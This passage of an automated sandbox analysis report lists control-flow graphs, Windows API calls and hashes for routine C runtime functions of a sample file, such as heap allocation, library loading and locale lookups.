                            • Associated: 00000000.00000002.1421561944.0000000000341000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_300000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: AddressProc$CreateHandleModuleProcess
                            • String ID:
                            • API String ID: 1919063930-0
                            • Opcode ID: 9e99de7832f1567aad711bdebcda9a48571c668e4ea4c8efd7f2ccf178d330c3
                            • Instruction ID: ed9589d73fcee55b40d836b40e491303026e85c66559d60106d3e5b4f9a23a53
                            • Opcode Fuzzy Hash: 9e99de7832f1567aad711bdebcda9a48571c668e4ea4c8efd7f2ccf178d330c3
                            • Instruction Fuzzy Hash: 79F29A31D05B898EE722CB38C8457EAB7F8BF59344F00875EE499A6252EB7176C5CB04

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 276 31abad-31abb9 277 31ac4b-31ac4e 276->277 278 31ac54 277->278 279 31abbe-31abcf 277->279 280 31ac56-31ac5a 278->280 281 31abd1-31abd4 279->281 282 31abdc-31abf5 LoadLibraryExW 279->282 285 31ac74-31ac76 281->285 286 31abda 281->286 283 31abf7-31ac00 GetLastError 282->283 284 31ac5b-31ac6b 282->284 288 31ac02-31ac14 call 319038 283->288 289 31ac39-31ac46 283->289 284->285 290 31ac6d-31ac6e FreeLibrary 284->290 285->280 287 31ac48 286->287 287->277 288->289 293 31ac16-31ac28 call 319038 288->293 289->287 290->285 293->289 296 31ac2a-31ac37 LoadLibraryExW 293->296 296->284 296->289
                            APIs
                            • FreeLibrary.KERNEL32(00000000,?,0031ACBC,?,?,00000000,?,?,?,0031AE6A,00000022,FlsSetValue,0032FFBC,0032FFC4,?), ref: 0031AC6E
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1421497800.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                            • Associated: 00000000.00000002.1421478437.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421524477.000000000032C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421545894.000000000033F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421561944.0000000000341000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_300000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: FreeLibrary
                            • String ID: api-ms-$ext-ms-
                            • API String ID: 3664257935-537541572
                            • Opcode ID: 9b90367c7f45cf6785a79f5af866e6b664e62f96387bb8b42a91cf1aa65872c6
                            • Instruction ID: d584145a709c63ac04a35c0a415253acd91aa2c42a41ede898c7b0c67e3901a7
                            • Opcode Fuzzy Hash: 9b90367c7f45cf6785a79f5af866e6b664e62f96387bb8b42a91cf1aa65872c6
                            • Instruction Fuzzy Hash: 90213D71A02910EBCB3B9B60DD40ADA776CDF4A761F160124FD06E7290D730ED41C6D1

                            Control-flow Graph

                            APIs
                            • GetCurrentProcess.KERNEL32(?,?,00311A40,00000016,003115E2,?,?,84FDAC87,003115E2,?), ref: 00311A57
                            • TerminateProcess.KERNEL32(00000000,?,00311A40,00000016,003115E2,?,?,84FDAC87,003115E2,?), ref: 00311A5E
                            • ExitProcess.KERNEL32 ref: 00311A70
                            Memory Dump Source
                            • Source File: 00000000.00000002.1421497800.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                            • Associated: 00000000.00000002.1421478437.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421524477.000000000032C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421545894.000000000033F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421561944.0000000000341000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_300000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: Process$CurrentExitTerminate
                            • String ID:
                            • API String ID: 1703294689-0
                            • Opcode ID: 32c4e760d5ec68f1bd613004bff8a4eacda8b797df841d78c120d1fd5827af55
                            • Instruction ID: 1188e8814b01526d4a6d7c93003f6ae4075e235b525bb3cada45f5278a246ce1
                            • Opcode Fuzzy Hash: 32c4e760d5ec68f1bd613004bff8a4eacda8b797df841d78c120d1fd5827af55
                            • Instruction Fuzzy Hash: 19D09E31011208EBCF176FA0DD0D9DD3F2EBF44385B059014BA0549031CB31D992DA80

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 519 319744-31974d 520 31977c-31977d 519->520 521 31974f-319762 RtlFreeHeap 519->521 521->520 522 319764-31977b GetLastError call 315aa1 call 315b3e 521->522 522->520
                            APIs
                            • RtlFreeHeap.NTDLL(00000000,00000000,?,00320F1C,?,00000000,?,?,003211BD,?,00000007,?,?,003216B1,?,?), ref: 0031975A
                            • GetLastError.KERNEL32(?,?,00320F1C,?,00000000,?,?,003211BD,?,00000007,?,?,003216B1,?,?), ref: 00319765
                            Memory Dump Source
                            • Source File: 00000000.00000002.1421497800.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                            • Associated: 00000000.00000002.1421478437.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421524477.000000000032C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421545894.000000000033F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421561944.0000000000341000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_300000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: ErrorFreeHeapLast
                            • String ID:
                            • API String ID: 485612231-0
                            • Opcode ID: c8637be7b6cd51ef36478ac57090a52218adc59685c4a98ab432f13c3548680f
                            • Instruction ID: 79c3584680453fe543dd23ca0133dff8e9e95f9f6c470243a0b5c7576d540a92
                            • Opcode Fuzzy Hash: c8637be7b6cd51ef36478ac57090a52218adc59685c4a98ab432f13c3548680f
                            • Instruction Fuzzy Hash: 8EE08632640604EBCB2B2FB0AC4CBD93B5C9F4C792F094015F6089A161CA7098D28784

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 527 309f90-309fcb 528 309fd1-309fef 527->528 529 30a16b call 309d00 527->529 531 309ff1-30a002 528->531 532 30a004-30a014 528->532 533 30a170-30a197 call 3117ef call 309340 call 3081f0 call 30e360 529->533 534 30a043-30a04e call 30cd92 531->534 535 30a166 call 301190 532->535 536 30a01a-30a024 532->536 534->533 547 30a054-30a060 534->547 535->529 540 30a030-30a036 536->540 541 30a026-30a02e 536->541 543 30a062-30a06e call 30cd92 540->543 544 30a038-30a03d 540->544 542 30a070-30a0a8 call 306d20 541->542 555 30a0b4-30a0c7 542->555 556 30a0aa-30a0b1 542->556 543->542 544->534 544->535 547->542 557 30a0e0-30a0f0 call 30a680 555->557 558 30a0c9-30a0df call 30a680 555->558 556->555 567 30a0f2-30a117 call 309340 557->567 568 30a135-30a163 557->568 558->557 571 30a119-30a127 567->571 572 30a12b-30a12d call 30cdc2 567->572 571->533 573 30a129 571->573 575 30a132 572->575 573->572 575->568
                            APIs
                            • Concurrency::cancel_current_task.LIBCPMT ref: 0030A166
                              • Part of subcall function 00301190: ___std_exception_copy.LIBVCRUNTIME ref: 003011CE
                            Memory Dump Source
                            • Source File: 00000000.00000002.1421497800.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                            • Associated: 00000000.00000002.1421478437.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421524477.000000000032C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421545894.000000000033F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421561944.0000000000341000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_300000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: Concurrency::cancel_current_task___std_exception_copy
                            • String ID:
                            • API String ID: 1979911387-0
                            • Opcode ID: f0889e19c497c0373af77e7d54634ad9379414580978a839744a86a6ac8da8d4
                            • Instruction ID: babd3220c3ab1089edb1cdce0c6ad6849ab5f1cfd263bb90fc129cabc8011315
                            • Opcode Fuzzy Hash: f0889e19c497c0373af77e7d54634ad9379414580978a839744a86a6ac8da8d4
                            • Instruction Fuzzy Hash: 2B51F275B126048FCB1EDF68ECA1B6E77A9AB48310F144229E915DB3D1DB34E904CB81

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 576 308c20-308c3e 577 308d62 call 301230 576->577 578 308c44-308c58 576->578 583 308d67 call 301190 577->583 579 308c80-308c88 578->579 580 308c5a 578->580 584 308c91-308c9d 579->584 585 308c8a-308c8f 579->585 582 308c5c-308c61 580->582 586 308c64-308c65 call 30cd92 582->586 591 308d6c-308d71 call 3117ef 583->591 588 308ca3-308ca9 584->588 589 308c9f-308ca1 584->589 585->582 597 308c6a-308c6f 586->597 593 308cb8-308cc1 call 30cd92 588->593 594 308cab-308cb0 588->594 592 308cc6-308ce2 589->592 595 308ce4-308d0e call 30e480 * 2 592->595 596 308d39-308d5f call 30e480 * 2 592->596 606 308cc3 593->606 594->583 599 308cb6 594->599 613 308d10-308d1e 595->613 614 308d22-308d36 call 30cdc2 595->614 597->591 603 308c75-308c7e 597->603 599->586 603->606 606->592 613->591 615 308d20 613->615 615->614
                            APIs
                            • Concurrency::cancel_current_task.LIBCPMT ref: 00308D67
                            Memory Dump Source
                            • Source File: 00000000.00000002.1421497800.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                            • Associated: 00000000.00000002.1421478437.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421524477.000000000032C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421545894.000000000033F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421561944.0000000000341000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_300000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: Concurrency::cancel_current_task
                            • String ID:
                            • API String ID: 118556049-0
                            • Opcode ID: 5551ff29b8990e5b3eca07f980bc36e9c3a6f1d6a6046582034cd12cb8b53426
                            • Instruction ID: 979e57eed105b951bbe5e1814de4726a6d6f3ccb77c9d1b7956b67407e49cb66
                            • Opcode Fuzzy Hash: 5551ff29b8990e5b3eca07f980bc36e9c3a6f1d6a6046582034cd12cb8b53426
                            • Instruction Fuzzy Hash: 3E41F372A021089FDB16EF68DC9069EBBB5EF58300F150669F845DB381DA30DD6187A1

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 618 306d20-306d46 619 306d48-306d4a 618->619 620 306d4d-306d53 618->620 619->620 621 306df6 call 301230 620->621 622 306d59-306d5c 620->622 628 306dfb call 301190 621->628 624 306d77-306d82 622->624 625 306d5e-306d74 622->625 626 306d84-306d8e 624->626 627 306dab-306dba 624->627 629 306d91-306d9e call 30cd92 626->629 631 306dd5-306df3 call 30e480 627->631 632 306dbc-306dc1 627->632 634 306e00-306e22 call 3117ef 628->634 629->634 643 306da0-306da9 629->643 635 306dc3-306dc8 632->635 636 306dcc-306dcd call 30cd92 632->636 646 306e24-306e29 634->646 647 306e47-306e4b 634->647 635->628 640 306dca 635->640 645 306dd2 636->645 640->629 643->631 645->631 650 306e2b-306e32 646->650 651 306e3c-306e44 call 30cdc2 646->651 648 306e58-306e5d 647->648 649 306e4d-306e55 call 30cdc2 647->649 649->648 650->651 657 306e34-306e38 650->657 651->647 657->651
                            APIs
                            • Concurrency::cancel_current_task.LIBCPMT ref: 00306DFB
                              • Part of subcall function 00301190: ___std_exception_copy.LIBVCRUNTIME ref: 003011CE
                            Memory Dump Source
                            • Source File: 00000000.00000002.1421497800.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                            • Associated: 00000000.00000002.1421478437.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421524477.000000000032C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421545894.000000000033F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421561944.0000000000341000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_300000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: Concurrency::cancel_current_task___std_exception_copy
                            • String ID:
                            • API String ID: 1979911387-0
                            • Opcode ID: 7840ff986a5c211dd7a836ff085a24b04053c828d164257361be389f283a0d64
                            • Instruction ID: b40353e8aa9cc37c383d853e79cef37de5c287109960c5a864fbae55018a2517
                            • Opcode Fuzzy Hash: 7840ff986a5c211dd7a836ff085a24b04053c828d164257361be389f283a0d64
                            • Instruction Fuzzy Hash: 56312472B023019BD7169F24D862B6AB7A8EF54310F15023AF8158B6D1EB71EDA0C7A1

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 658 31ac78-31aca2 659 31aca4-31aca6 658->659 660 31aca8-31acaa 658->660 661 31acf9-31acfc 659->661 662 31acb0-31acc0 call 31abad 660->662 663 31acac-31acae 660->663 666 31acc2-31acd0 GetProcAddress 662->666 667 31acdf-31acf6 662->667 663->661 666->667 668 31acd2-31acdd call 3118a8 666->668 669 31acf8 667->669 668->669 669->661
                            Memory Dump Source
                            • Source File: 00000000.00000002.1421497800.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                            • Associated: 00000000.00000002.1421478437.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421524477.000000000032C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421545894.000000000033F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421561944.0000000000341000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_300000_SecuriteInfo.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 5d20e6feb764a0c4f00bdd1b4088db9c13bb97066033df57e062e729dea4fdf5
                            • Instruction ID: ce6f70409b2d534b72e5f9d7b71333dd2a6b958e4ee652d76b5b84cfc93137d8
                            • Opcode Fuzzy Hash: 5d20e6feb764a0c4f00bdd1b4088db9c13bb97066033df57e062e729dea4fdf5
                            • Instruction Fuzzy Hash: 0E01F9336119259FCB1F8B6CED80A9A33ADB7C9361B654024F900DB169DA31D8C09BD1

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 672 30cd92-30cd95 673 30cda4-30cda7 call 315152 672->673 675 30cdac-30cdaf 673->675 676 30cdb1-30cdb2 675->676 677 30cd97-30cda2 call 3163fa 675->677 677->673 680 30cdb3-30cdb7 677->680 681 301190-3011e0 call 301170 call 30e360 call 30e0fd 680->681 682 30cdbd 680->682 682->682
                            APIs
                            • ___std_exception_copy.LIBVCRUNTIME ref: 003011CE
                            Memory Dump Source
                            • Source File: 00000000.00000002.1421497800.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                            • Associated: 00000000.00000002.1421478437.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421524477.000000000032C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421545894.000000000033F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421561944.0000000000341000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_300000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: ___std_exception_copy
                            • String ID:
                            • API String ID: 2659868963-0
                            • Opcode ID: e233d7f0f346ff3eae9795d4458be297b3267382dbdc810ae8b9a51aa8df8ac4
                            • Instruction ID: 36d5d93ec019bd47afd6948bef74fab55127bdbb37479840ff3260cfcb368c66
                            • Opcode Fuzzy Hash: e233d7f0f346ff3eae9795d4458be297b3267382dbdc810ae8b9a51aa8df8ac4
                            • Instruction Fuzzy Hash: 0201DB3551030DA7CB1AABE8EC125D97B9CAE05350B108636FA14DA5D1EB70E594C691

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 689 3196e7-3196f2 690 319700-319706 689->690 691 3196f4-3196fe 689->691 693 319708-319709 690->693 694 31971f-319730 RtlAllocateHeap 690->694 691->690 692 319734-31973f call 315b3e 691->692 699 319741-319743 692->699 693->694 695 319732 694->695 696 31970b-319712 call 318834 694->696 695->699 696->692 702 319714-31971d call 3163fa 696->702 702->692 702->694
                            APIs
                            • RtlAllocateHeap.NTDLL(00000008,?,?,?,0031954E,00000001,00000364,?,00000005,000000FF,?,?,0030E127,?), ref: 00319728
                            Memory Dump Source
                            • Source File: 00000000.00000002.1421497800.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                            • Associated: 00000000.00000002.1421478437.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421524477.000000000032C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421545894.000000000033F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421561944.0000000000341000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_300000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: AllocateHeap
                            • String ID:
                            • API String ID: 1279760036-0
                            • Opcode ID: 39eb039682b22512450f10e2e127f31aad890f6e20d570de61f3e73a04b41dbf
                            • Instruction ID: da35335e3b7792e036d3c0aa974197e30f1bd57608c7f7961202ef7aba86c518
                            • Opcode Fuzzy Hash: 39eb039682b22512450f10e2e127f31aad890f6e20d570de61f3e73a04b41dbf
                            • Instruction Fuzzy Hash: 93F0B436621520E7DB2F5F659C55BDA374CEF5D760F1A4023ED18DB1D0CE30D98182A0

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 705 31977e-31978a 706 3197bc-3197c7 call 315b3e 705->706 707 31978c-31978e 705->707 715 3197c9-3197cb 706->715 708 319790-319791 707->708 709 3197a7-3197b8 RtlAllocateHeap 707->709 708->709 711 319793-31979a call 318834 709->711 712 3197ba 709->712 711->706 717 31979c-3197a5 call 3163fa 711->717 712->715 717->706 717->709
                            APIs
                            • RtlAllocateHeap.NTDLL(00000000,?,?,?,0030E127,?,?,?,?,?,00301103,?,?), ref: 003197B0
                            Memory Dump Source
                            • Source File: 00000000.00000002.1421497800.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                            • Associated: 00000000.00000002.1421478437.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421524477.000000000032C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421545894.000000000033F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421561944.0000000000341000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_300000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: AllocateHeap
                            • String ID:
                            • API String ID: 1279760036-0
                            • Opcode ID: 9adfc55c13b7a0b8dfd7250fabbcb452e40c278b3293de06f9682e50a2cd47ef
                            • Instruction ID: 847774c1b5b923570604e16defe46bc67a451f7f75d5c1d969812f83d36fa24f
                            • Opcode Fuzzy Hash: 9adfc55c13b7a0b8dfd7250fabbcb452e40c278b3293de06f9682e50a2cd47ef
                            • Instruction Fuzzy Hash: 43E02B35A2051197DA3B3F698C107DB7A4CDF497B0F1E4127EC069A0D1DF61CCC181A1

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 720 316dca-316df8 call 30d5f1 call 316b22 724 316dfd-316e02 call 30d5ce 720->724
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1421497800.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                            • Associated: 00000000.00000002.1421478437.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421524477.000000000032C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421545894.000000000033F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421561944.0000000000341000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_300000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: H_prolog3
                            • String ID:
                            • API String ID: 431132790-0
                            • Opcode ID: 0166a5c0a04667e8efadab5fad5bb22dbb9025a74de003927b855d4cc256de3a
                            • Instruction ID: ce33191cb3e5da83c7d3344cdbdb5c63b922c6e63c2f1170c60986d8c678e699
                            • Opcode Fuzzy Hash: 0166a5c0a04667e8efadab5fad5bb22dbb9025a74de003927b855d4cc256de3a
                            • Instruction Fuzzy Hash: 83E09A76C0120D9EDB01DFD4C452BEFBBFCAF08304F508026A605EA181EB7457458BA1

                            Non-executed Functions

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1421497800.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                            • Associated: 00000000.00000002.1421478437.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421524477.000000000032C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421545894.000000000033F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421561944.0000000000341000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_300000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: __floor_pentium4
                            • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                            • API String ID: 4168288129-2761157908
                            • Opcode ID: b22c4350bf6a37f8290311a012320a8963e4bc287fbf31f31c47bcb7ed9843f6
                            • Instruction ID: a0154d404715fa91b1bedf204bcabc18434b68971ce92d2011497fa3b14bbdb2
                            • Opcode Fuzzy Hash: b22c4350bf6a37f8290311a012320a8963e4bc287fbf31f31c47bcb7ed9843f6
                            • Instruction Fuzzy Hash: 2CD24A71E082388FDB66CE28ED407EAB7B9EB45304F1545EAD40DE7240E778AE858F41
                            APIs
                            • GetLocaleInfoW.KERNEL32(00000000,2000000B,003229D9,00000002,00000000,?,?,?,003229D9,?,00000000), ref: 00322760
                            • GetLocaleInfoW.KERNEL32(00000000,20001004,003229D9,00000002,00000000,?,?,?,003229D9,?,00000000), ref: 00322789
                            • GetACP.KERNEL32(?,?,003229D9,?,00000000), ref: 0032279E
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1421497800.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                            • Associated: 00000000.00000002.1421478437.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421524477.000000000032C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421545894.000000000033F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421561944.0000000000341000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_300000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: InfoLocale
                            • String ID: ACP$OCP
                            • API String ID: 2299586839-711371036
                            • Opcode ID: 5689e7bb6d0b398ae2787e0dc6abc44c517ae073ee2d9dfe8ffb9d1a3fc941f3
                            • Instruction ID: 7b1f257732352ba9a376076180b7d1d5c32447e654115192311d130e4cb0c551
                            • Opcode Fuzzy Hash: 5689e7bb6d0b398ae2787e0dc6abc44c517ae073ee2d9dfe8ffb9d1a3fc941f3
                            • Instruction Fuzzy Hash: 1021C536608120BADB3B8F5CED41AA773AAEF64F60B578434E90AD7112E732DD41C350
                            APIs
                              • Part of subcall function 003193B0: GetLastError.KERNEL32(?,00000000,00315BD4,?,?,?,?,00000003,003115E2,?,00311551,?,00000016,00311760), ref: 003193B4
                              • Part of subcall function 003193B0: SetLastError.KERNEL32(00000000,00000016,00311760,?,?,?,?,?,00000000), ref: 00319456
                            • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 003229AB
                            • IsValidCodePage.KERNEL32(00000000), ref: 003229E9
                            • IsValidLocale.KERNEL32(?,00000001), ref: 003229FC
                            • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00322A44
                            • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00322A5F
                            Memory Dump Source
                            • Source File: 00000000.00000002.1421497800.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                            • Associated: 00000000.00000002.1421478437.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421524477.000000000032C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421545894.000000000033F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421561944.0000000000341000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_300000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                            • String ID:
                            • API String ID: 415426439-0
                            • Opcode ID: 05775229fc69b92f657b9d0dacb87b079bf3d6629e11dde6dec31d0168945db8
                            • Instruction ID: f0b64c9842d54921c4b63d2670605726330bc008c8a3f9afe443c06431448316
                            • Opcode Fuzzy Hash: 05775229fc69b92f657b9d0dacb87b079bf3d6629e11dde6dec31d0168945db8
                            • Instruction Fuzzy Hash: CB516171900226BBDB26DFA5EC41ABF77B8FF14700F054529E911EB190EB719E50CB61
                            APIs
                              • Part of subcall function 003193B0: GetLastError.KERNEL32(?,00000000,00315BD4,?,?,?,?,00000003,003115E2,?,00311551,?,00000016,00311760), ref: 003193B4
                              • Part of subcall function 003193B0: SetLastError.KERNEL32(00000000,00000016,00311760,?,?,?,?,?,00000000), ref: 00319456
                            • GetACP.KERNEL32(?,?,?,?,?,?,003178B4,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 00321FED
                            • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,003178B4,?,?,?,00000055,?,-00000050,?,?), ref: 00322024
                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00322187
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1421497800.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                            • Associated: 00000000.00000002.1421478437.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421524477.000000000032C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421545894.000000000033F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421561944.0000000000341000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_300000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: ErrorLast$CodeInfoLocalePageValid
                            • String ID: utf8
                            • API String ID: 607553120-905460609
                            • Opcode ID: 3cd3ccc0f1c4049d721a53a5604e4b4b9c119846a0c8da62519b41255cea8052
                            • Instruction ID: b6ee684ade9477e195264f818111dba44dcb5595f8a4085e42dbcb3ad4fb766e
                            • Opcode Fuzzy Hash: 3cd3ccc0f1c4049d721a53a5604e4b4b9c119846a0c8da62519b41255cea8052
                            • Instruction Fuzzy Hash: 45711932600721BADB2BAB74ED42FBB73ACEF14700F114529F615DB181EB70E950C6A1
                            Memory Dump Source
                            • Source File: 00000000.00000002.1421497800.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                            • Associated: 00000000.00000002.1421478437.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421524477.000000000032C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421545894.000000000033F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1421561944.0000000000341000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_300000_SecuriteInfo.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c978cbae2d2b2e7e34fda7347b027cb190bd780ef1dc569dc29ed165eb3e7d8e
                            • Instruction ID: e213e81cc160fec4830f470fb49f797a500ea6fc7213e84baf4d861cb39ad51d
